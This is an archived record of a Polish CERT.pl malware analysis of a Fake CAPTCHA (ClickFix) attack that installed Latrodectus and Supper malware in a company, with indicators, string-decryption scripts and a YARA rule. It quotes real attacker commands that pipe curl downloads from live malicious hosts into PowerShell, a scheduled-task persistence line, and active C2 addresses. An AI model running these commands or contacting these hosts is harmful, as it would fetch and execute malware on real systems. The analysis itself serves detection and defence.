{
	"id": "ae9a3f27-bd3a-4021-be5a-7529dc316952",
	"created_at": "2026-04-06T00:16:15.925801Z",
	"updated_at": "2026-04-10T03:20:50.599807Z",
	"deleted_at": null,
	"sha1_hash": "7bbab729935fccb2d2ed5f49bb4283457e3b1a1e",
	"title": "ClickFix w akcji: jak fake captcha może zaszyfrować całą firmę",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 257954,
	"plain_text": "ClickFix w akcji: jak fake captcha może zaszyfrować całą firmę\r\nArchived: 2026-04-05 23:47:36 UTC\r\nWprowadzenie\r\nKilka miesięcy temu dowiedzieliśmy się, że jedna z dużych polskich organizacji padła ofiarą ataku malware, a\r\natakujący jest aktywny w jej sieci. Podczas obsługi incydentu wspieraliśmy zarówno organy ścigania, jak i\r\nzaatakowaną organizację w dochodzeniu i usuwaniu skutków ataku.\r\nChociaż nasza analiza opiera się na danych zebranych w konkretnej firmie, kampanie typu Fake CAPTCHA mają\r\ncharakter masowy i nie są wymierzone w konkretne organizacje. Incydent ten jest naszym zdaniem dobrym\r\nprzykładem, pozwalającym pokazać pełny łańcuch ataku oraz to, w jaki sposób pojedynczy zainfekowany\r\nużytkownik może zagrozić bezpieczeństwu całej firmy. Dołączyliśmy również szczegółową analizę\r\nwykorzystanych próbek złośliwego oprogramowania.\r\nAnaliza złośliwego oprogramowania\r\nPodczas analizy jednej ze stacji roboczych zidentyfikowaliśmy katalog\r\n%APPDATA%\\Intel , który zwrócił naszą uwagę. Znajdowały się w nim następujące pliki:\r\nb7f8750851e70ec755343d322d7d81ea0fc1b12d4a1ab6a60e7c8605df4cd6a5 igfxSDK.exe\r\naf45a728552ccfdcd9435c40ace60a9354d7c1b52abf507a2f1cb371dada4fde version.dll\r\nbe5bcdfc0dbe204001b071e8270bd6856ce6841c43338d8db914e045147b0e77 wtsapi32.dll\r\nPodczas gdy pliki version.dll i igfxSDK.exe były standardowymi plikami systemu Windows, wtsapi32.dll\r\nwydał się nam podejrzany, ponieważ taka sytuacja jest charakterystyczna dla tzw. side-loadingu DLL.\r\nSkan dysku wykrył także dwa dodatkowe podejrzane pliki w katalogu /Users/[username]/AppData/Local/ :\r\n2528df60e55f210a6396dd7740d76afe30d5e9e8684a5b8a02a63bdcb5041bfc 245282244.dll\r\n21b953dc06933a69bcb2e0ea2839b47288fc8f577e183c95a13fc3905061b4e6 760468301.dll\r\nWektor infekcji\r\nNajpierw spróbowaliśmy ustalić, w jaki sposób złośliwe oprogramowanie trafiło na stację roboczą ofiary. W\r\nlogach zidentyfikowaliśmy następujące polecenie:\r\ncmd /c curl naintn.com/amazoncdn.com/oeiich37874cj30dkk43885j10vj38h38jd/nrs/opn/ca/ | powershell\r\nFakt wpisania takiej komendy przez ofiarę wyraźnie wskazywał na atak Fake CAPTCHA (ClickFix). W tym ataku\r\natakujący próbuje nakłonić ofiarę do skopiowania złośliwego fragmentu kodu i jego uruchomienia przy użyciu\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 1 of 9\n\nskrótu Win+R. Obserwujemy rosnącą liczbę ataków przeprowadzanych w ten sposób w Polsce.\r\nPodczas poszukiwań tego adresu URL znaleźliśmy próbkę\r\n6673794376681c48ce4981b42e9293eee010d60ef6b100a3866c0abd571ea648 w serwisie VirusTotal. Przeszukując\r\nlogi pod kątem zdarzeń związanych z tym URL, udało nam się zidentyfikować kolejne złośliwe domeny. Jedna z\r\ntych domen była już wcześniej rozpoznana jako domena serwująca Fake CAPTCHA, ponieważ napotkaliśmy ją w\r\nprzeszłości w innym incydencie. Udało nam się wyciągnąć z niej złośliwy kod:\r\nW kodzie JavaScript osadzonym na tej stronie znaleźliśmy również token Telegrama:\r\nconst TELEGRAM_BOT_TOKEN = '7708755483:An7X_G5mbD3YhjDI_Ss';\r\nconst TELEGRAM_CHAT_ID = '78510';\r\nŁatwo zauważyć, że ten token nie jest prawidłowym tokenem Telegrama - jest zbyt krótki. W związku z tym kod\r\nnie mógł nigdy działać zgodnie z zamierzeniem. Możliwe, że jest to wynik błędu, ale podejrzewamy, że kod został\r\nwygenerowany przez LLM i nie został odpowiednio dostosowany.\r\nNatrafiliśmy także na inne, podobne polecenie w logach:\r\ncmd /c curl jzluw.com/cdn-dynmedia-1.microsoft.com/is/n03ufh3k003jdhkg99fhhas/is/content/ | powershell\r\nSzukając podobnych indykatorów odkryliśmy więcej polskich domen zainfekowanych w ten sam sposób.\r\nProaktywne polowanie na zagrożenia tego typu pozwala nam reagować szybciej na ataki.\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 2 of 9\n\nOprogramowanie Latrodectus\r\nPo zakończeniu wstępnej analizy przeszliśmy do szczegółowej analizy złośliwego złośliwego oprogramowania,\r\naby poszerzyć naszą wiedzę na temat incydentu i zdobyć dodatkowe wskaźniki IoC. Pierwszą analizowaną próbką\r\nbyła side-loadowana biblioteka DLL:\r\nbe5bcdfc0dbe204001b071e8270bd6856ce6841c43338d8db914e045147b0e77 wtsapi32.dll\r\nUruchomiliśmy ją przy pomocy oprogramowania DRAKVUF Sandbox i zaobserwowaliśmy żądania podobne do\r\nponiższych:\r\nhttps://gasrobariokley.com/work/?counter=0\u0026type=1\u0026guid=3B7FFFF7F331576B6FA3479BDF43\u0026os=6\u0026arch=1\u0026username=JohnDo\r\nhttps://fadoklismokley.com/work/?counter=0\u0026type=1\u0026guid=3B7FFFF7F331576B6FA3479BDF43\u0026os=6\u0026arch=1\u0026username=JohnDoe\r\nPodczas ręcznej analizy ustaliliśmy, że próbka była obfuskowana przy użyciu nieznanego nam obfuskatora.\r\nŁadując tę bibliotekę do debuggera i przechwytując odpowiednie wywołanie funkcji VirtualProtect , udało\r\nnam się uzyskać czysty zrzut pamięci. Zrzut ten pasował do reguły win_latrodectus_g0 autorstwa Slavo ze\r\nSWITCH (udostępnionej na zasadach TLP:GREEN w Malpedii).\r\nAnalizując dostępne materiały dotyczące tej rodziny, potwierdziliśmy, że próbka należy do rodziny złośliwego\r\noprogramowania Latrodectus. Warto zauważyć, że wersja zaobserwowana w URL żądania to 2.3 . Nie udało\r\nnam się znaleźć żadnych publicznych analiz Latrodectus w wersji 2, a tym bardziej konkretnie wersji 2.3 .\r\nNiemniej jednak istnieje wiele wysokiej jakości analiz wersji 1, a różnice między wersjami nie są bardzo duże.\r\nNie jest to jednak najnowsza wersja - znaleźliśmy próbki Latrodectus z wersją co najmniej v2.5 .\r\nJedną z interesujących technik utrudniających analizę dynamiczną i stosowanych przez malware jest to, że\r\nprogram odmawia wykonania kodu w przypadku uruchomienia za pomocą rundll.exe lub regsrv32.exe .\r\nObecne były również inne typowe mechanizmy antydebugowe. Największym z wyzwań było odpinanie hooków\r\nna funkcje biblioteki NTDLL (NTDLL unhooking), polegające na samodzielnym odczytaniu pliku ntdll.dll z\r\ndysku i ręcznym zaimportowaniu go do procesu, co pozwala na ominięcie typowych mechanizmów wykrywania\r\nstosowanych przez AV i debugery. Obeszliśmy to zabezpieczenie wykonując kolejny zrzut pamięci po pełnym\r\nwypakowaniu kodu malware, a następnie automatyczne odzyskanie importów.\r\nNa koniec, zaimplementowaliśmy skrypt do deszyfrowania stringów:\r\nfrom malduck import *\r\nkey = bytes([0xd6, 0x23, 0xb8, 0xef, 0x62, 0x26, 0xce, 0xc3, 0xe2, 0x4c, 0x55, 0x12, 0x7d, 0xe8, 0x73, 0xe7, 0x8\r\ndatas = open(\"encrypted.txt\", \"r\").read().strip().split(\"\\n\")\r\nfor entry in datas:\r\n addr, encoded_data = entry.split()\r\n chunk = bytes.fromhex(encoded_data)\r\n length, data = u16(chunk[:2]), chunk[2:]\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 3 of 9\n\nprint(addr, aes.ctr.decrypt(key, data[:16], data[16:16+length]).decode().replace(\"\\x00\", \"\"))\r\nKlucz deszyfrujący wyciągnęliśmy ręcznie, natomiast plik encrypted.txt zawierał zaszyfrowane ciągi znaków\r\nz binarki i został wygenerowany przy użyciu następującego skryptu ghidralib:\r\nfrom ghidralib import *\r\nf = Function(\"string_decrypt\")\r\nfor call in f.calls:\r\n try:\r\n e = Emulator()\r\n e.emulate(call.address - 7, [call.address])\r\n key = e[\"rcx\"]\r\n size = read_u16(key)\r\n print(hex(key) + \" \" + read_bytes(key, size+25).encode(\"hex\"))\r\n except:\r\n pass\r\nKorzystamy tutaj z faktu, że referencje do zaszyfrowanych ciągów znaków znajdują się prawie zawsze\r\nbezpośrednio przed wywołaniem funkcji, dzięki czemu możemy emulować po kilka instrukcji poprzedzających\r\nopcode CALL i odczytać stan rejestru ECX.\r\nPo odfiltrowaniu mniej istotnych wyników uzyskaliśmy następującą listę:\r\n0x18000fd60 runnung\r\n0x180010060 Kallichore\r\n0x180010898 https://gasrobariokley.com/work/\r\n0x1800108d0 https://fadoklismokley.com/work/\r\n0x1800112b8 \\update_data.dat\r\n0x180010a10 Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\r\n0x180011168 \\Registry\\Machine\\\r\n0x180010bd0 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\n0x180010340 KK4Yp3894K6jOwLqbvOT035AwCpkKlxZeCzBLsKHt0k3j5yI0REck3FegyF6rcWq\r\n0x1800103a0 counter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\n0x180010420 counter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\n0x1800104a0 /c reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid | findstr MachineGuid\r\n0x180010580 C:\\Windows\\System32\\cmd.exe\r\n0x1800105e0 /c reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\IDConfigDB\\Hardware Profiles\\0001\" /v\r\n0x180010710 C:\\Windows\\System32\\cmd.exe\r\n0x180010770 counter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\n0x180010830 \u0026dpost=\r\n0x180010190 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\n0x180010220 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\n0x1800100b0 Content-Type: application/x-www-form-urlencoded\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 4 of 9\n\n0x180010118 POST\r\n0x180010138 GET\r\n0x1800102c0 CLEARURL\r\n0x1800102e0 URLS\r\n0x180010300 COMMAND\r\n0x180010320 ERROR\r\n0x180010000 front\r\n0x180010020 /files/\r\n0x18000fc00 \u0026desklinks=[\r\n0x18000fae8 \u0026proclist=[\r\n0x18000fb28 \"pid\":\r\n0x18000fb68 \"proc\":\r\n0x18000fba8 \"subproc\": [\r\n0x18000fa10 \"pid\":\r\n0x18000fa50 \"proc\":\r\n0x18000fa90 \"subproc\": [\r\n0x18000ffb0 C:\\Windows\\System32\\cmd.exe\r\n0x180010fc0 \u0026mac=\r\n0x180011038 \u0026computername=%s\r\n0x180011060 \u0026domain=%s\r\n0x180010f40 explorer.exe\r\n0x180011320 URLS|%d|%s\r\n0x180010ee0 12345\r\n0x18000f000 /c ipconfig /all\r\n0x18000f070 C:\\Windows\\System32\\cmd.exe\r\n0x18000f038 /c systeminfo\r\n0x18000f0c0 C:\\Windows\\System32\\cmd.exe\r\n0x18000f110 /c nltest /domain_trusts\r\n0x18000f190 C:\\Windows\\System32\\cmd.exe\r\n0x18000f1e0 /c nltest /domain_trusts /all_trusts\r\n0x18000f240 C:\\Windows\\System32\\cmd.exe\r\n0x18000f290 /c net view /all /domain\r\n0x18000f300 C:\\Windows\\System32\\cmd.exe\r\n0x18000f158 /c net view /all\r\n0x18000f350 C:\\Windows\\System32\\cmd.exe\r\n0x18000f3a0 /c net group \"Domain Admins\" /domain\r\n0x18000f400 C:\\Windows\\System32\\cmd.exe\r\n0x18000f450 /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\n0x18000f520 C:\\Windows\\System32\\wbem\\wmic.exe\r\n0x18000f580 /c net config workstation\r\n0x18000f5d0 C:\\Windows\\System32\\cmd.exe\r\n0x18000f620 /c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName\r\n0x18000f780 C:\\Windows\\System32\\cmd.exe\r\n0x18000f7d0 /c whoami /groups\r\n0x18000f810 C:\\Windows\\System32\\cmd.exe\r\n0x18000f2d8 \u0026ipconfig=\r\n0x18000f860 \u0026systeminfo=\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 5 of 9\n\n0x18000f888 \u0026domain_trusts=\r\n0x18000f8b0 \u0026domain_trusts_all=\r\n0x18000f8e0 \u0026net_view_all_domain=\r\n0x18000f910 \u0026net_view_all=\r\n0x18000f938 \u0026net_group=\r\n0x18000f960 \u0026wmic=\r\n0x18000f980 \u0026net_config_ws=\r\n0x18000f9a8 \u0026net_wmic_av=\r\n0x18000f9d0 \u0026whoami_group=\r\n0x180010e38 Content-Type: application/dns-message\r\n0x180010e78 Content-Type: application/ocsp-request\r\n0x180010eb8 Content-Length: 0\r\n0x180010f20 \u0026stiller=\r\nWśród odzyskanych łańcuchów znaków na szczególną uwagę zasługują:\r\nKallichore - nazwa grupy\r\nKK4Yp3894K6jOwLqbvOT035AwCpkKlxZeCzBLsKHt0k3j5yI0REck3FegyF6rcWq - klucz szyfrujący\r\nCLEARURL , URLS , COMMAND - polecenia C2\r\nwywołania cmd.exe , które mogą być wykorzystane jako IoC\r\nOstatnia istotna obserwacja, której dokonaliśmy wspomagając się wpisem na blogu VMRay, dotyczy faktu, że\r\nparametr group w żądaniu HTTP ( group=2201209746 w naszym przykładzie) jest hashem FNV-1a nazwy\r\nkampanii. Z samego żądania HTTP można więc odzyskać nazwę kampanii, przeprowadzając brute-force na\r\nzawartym w nim haszu.\r\nOprogramowanie Supper\r\nPrzeanalizowaliśmy również dwie dodatkowe podejrzane biblioteki DLL znalezione na maszynie. Pierwszą z nich\r\nbył plik 245282244.dll :\r\n2528df60e55f210a6396dd7740d76afe30d5e9e8684a5b8a02a63bdcb5041bfc 245282244.dll\r\n21b953dc06933a69bcb2e0ea2839b47288fc8f577e183c95a13fc3905061b4e6 760468301.dll\r\nPierwsza próbka była spakowana tym samym packerem co Latrodectus. Wykonaliśmy ręcznie dump pamięci w\r\nmomencie pierwszego dostępu typu execute do dynamicznie utworzonej sekcji RWX . Pozwoliło nam to\r\nuzyskać czysty i łatwy w analizie zrzut pamięci.\r\nDruga próbka była spakowana innym, nierozpoznanym typem packera, co utrudniło analizę i nie uzyskaliśmy\r\nczystego zrzutu pamięci. W momencie analizy próbka nie była dostępna w serwisie VirusTotal.\r\nGłówną funkcją w rozpakowanych bibliotekach DLL jest DllRegisterServer . Hardkodowane adresy IP\r\nserwerów to:\r\n85.239.54.130:1080 , 85.239.54.130:8080 - z pierwszej próbki, nieaktywne w czasie naszej analizy\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 6 of 9\n\n162.19.199.110:4043 - z pierwszej próbki, aktywny w czasie naszej analizy\r\n185.233.166.27:443 - z drugiej próbki\r\nPozwoliło nam to ustalić, że złośliwe oprogramowanie należy do rodziny Supper.\r\nJako mechanizm persystencji próbka dodawała się jako zaplanowane zadanie (Scheduled Task) w systemie\r\nWindows:\r\nschtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask /TR \"cmd.exe /C del \\\"%s\\\" \u0026\u0026 schtasks.exe /Delete /TN Goo\r\nAby w pełni zrozumieć możliwości złośliwego oprogramowania, przeprowadziliśmy analizę jego komunikacji\r\nsieciowej. Złośliwe oprogramowanie wysyła do serwera C2 następującą wiadomość:\r\nstruct msg {\r\n char[4] const1 = 0x00691155\r\n char[4] srvip; // IP of the target server\r\n char[0x100] computer_name\r\n char[0x100] user_name\r\n char[0x10] domain_name\r\n};\r\nW odpowiedziach otrzymaliśmy wyłącznie komendę 1, podkomendę 0. W tym przypadku złośliwe\r\noprogramowanie wykonuje następujące polecenie shellowe:\r\ncmd.exe /C ping 1.1.1.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \"%s\"\r\nPo dwóch bajtach określających komendę znajduje się reszta payloadu:\r\nstruct resp {\r\n uint16_t type1; // Command 1\r\n uint16_t type2; // Command 2\r\n uint32_t length;\r\n uint32_t key;\r\n char data[]; // encrypted\r\n};\r\nTen nagłówek jest \"zaszyfrowany\" przy użyciu jednobajtowego klucza XOR o wartości \"M\", natomiast dane są\r\nszyfrowane przy użyciu niestandardowego algorytmu przedstawionego poniżej:\r\ndef custom(data, key):\r\n out = []\r\n v2 = key[0]\r\n for v1 in range(len(data)):\r\n v2 = (v1 + v2 * 2) % 256\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 7 of 9\n\nout.append(key[v1 % 4] ^ data[v1] ^ (v2 % 256))\r\n return bytes(out)\r\nPonownie jedyną komendą, którą otrzymaliśmy była komenda numer 6. Polecenie to aktualizuje listę aktywnych\r\nserwerów C2. Aktualnie znane serwery C2 są zapisywane w katalogu %s/orl lub %s/s01bafg (w zależności od\r\npróbki). Inne obsługiwane polecenia to między innymi funkcja serwera proxy SOCKS oraz uruchamiania\r\nprogramów wysłanych z serwera C2.\r\nZnajomość protokołu komunikacji pozwoliła nam zaimplementować skrypt automatycznie pobierający kolejne\r\nadresy IP C2 i uzyskać następującą listę adresów IP serwerów C2:\r\n162.19.199.110: port 4043\r\n146.19.49.130: port 8080\r\n185.233.166.27: port 443\r\n85.239.54.130: nieaktywny\r\n171.130.169.141: nieaktywny\r\n130.49.19.146: błędny\r\n110.199.19.162: błędny\r\n27.166.233.185: błędny\r\nAdresy IP oznaczone jako \"błędne\" stanowią lustrzane odbicie rzeczywistych adresów IP C2 (na przykład\r\n4.3.2.1 zamiast 1.2.3.4 ). Podejrzewamy, że operatorzy nie byli pewni jaka kolejność bajtów jest poprawna i\r\nzdecydowali się na wszelki wypadek przesłać obie wersje (adres IP jest wysyłany przez serwer jako DWORD).\r\nPoniższy skrypt został użyty do deszyfrowania komunikacji C2:\r\nimport struct\r\nfrom malduck import chunks, u32, u16, xor\r\ndef custom(data, key):\r\n out = []\r\n v2 = key[0]\r\n for v1 in range(len(data)):\r\n v2 = (v1 + v2 * 2) % 256\r\n out.append(key[v1 % 4] ^ data[v1] ^ (v2 % 2**32))\r\n return bytes(out)\r\ndef decrypt(ip, payload):\r\n print(\"Payload:\", payload.hex())\r\n hdr = xor(payload[:12], b\"M\"*12)\r\n length = u32(hdr[4:8])\r\n key = hdr[8:12]\r\n body = payload[12:12+length]\r\n data = custom(body, key)\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 8 of 9\n\nips = []\r\n for c in chunks(data, 4):\r\n ips.append(\".\".join(str(q) for q in c))\r\n print(\"Decrypted IPS:\", ips)\r\nPoniższa reguła Yara może zostać wykorzystana, aby znaleźć rozpakowane próbki oprogramowania Supper.\r\nrule certpl_supper\r\n{\r\n meta:\r\n description = \"Supper malware, often pre-ransomware\"\r\n author = \"msm\"\r\n date = \"2025-10-01\"\r\n strings:\r\n $a1 = \"(%d)\\trecv type-%d len %d (0x%x)\"\r\n $a2 = \"bad socks5 request\"\r\n $a3 = \"[DEBUG MAIN SOCKS] Starting Init SOCKS\"\r\n $magic = {55 11 69 00}\r\n condition:\r\n 3 of them\r\n}\r\nPodsumowanie\r\nChociaż początkowy wektor infekcji jest stosunkowo prosty, ataki typu Fake CAPTCHA stanowią duże ryzyko,\r\ndając atakującemu możliwość wykonania dowolnego kodu w kontekście użytkownika.\r\nMamy nadzieję, że nasz wpis na blogu zwiększy świadomość tego typu zagrożenia i podkreśli znaczenie edukacji\r\npracowników oraz monitorowania nietypowych zdarzeń w firmie.\r\nSource: https://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nhttps://cert.pl/posts/2026/02/fake-captcha-in-action/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "PL",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.pl/posts/2026/02/fake-captcha-in-action/"
	],
	"report_names": [
		"fake-captcha-in-action"
	],
	"threat_actors": [],
	"ts_created_at": 1775434575,
	"ts_updated_at": 1775791250,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7bbab729935fccb2d2ed5f49bb4283457e3b1a1e.pdf",
		"text": "https://archive.orkl.eu/7bbab729935fccb2d2ed5f49bb4283457e3b1a1e.txt",
		"img": "https://archive.orkl.eu/7bbab729935fccb2d2ed5f49bb4283457e3b1a1e.jpg"
	}
}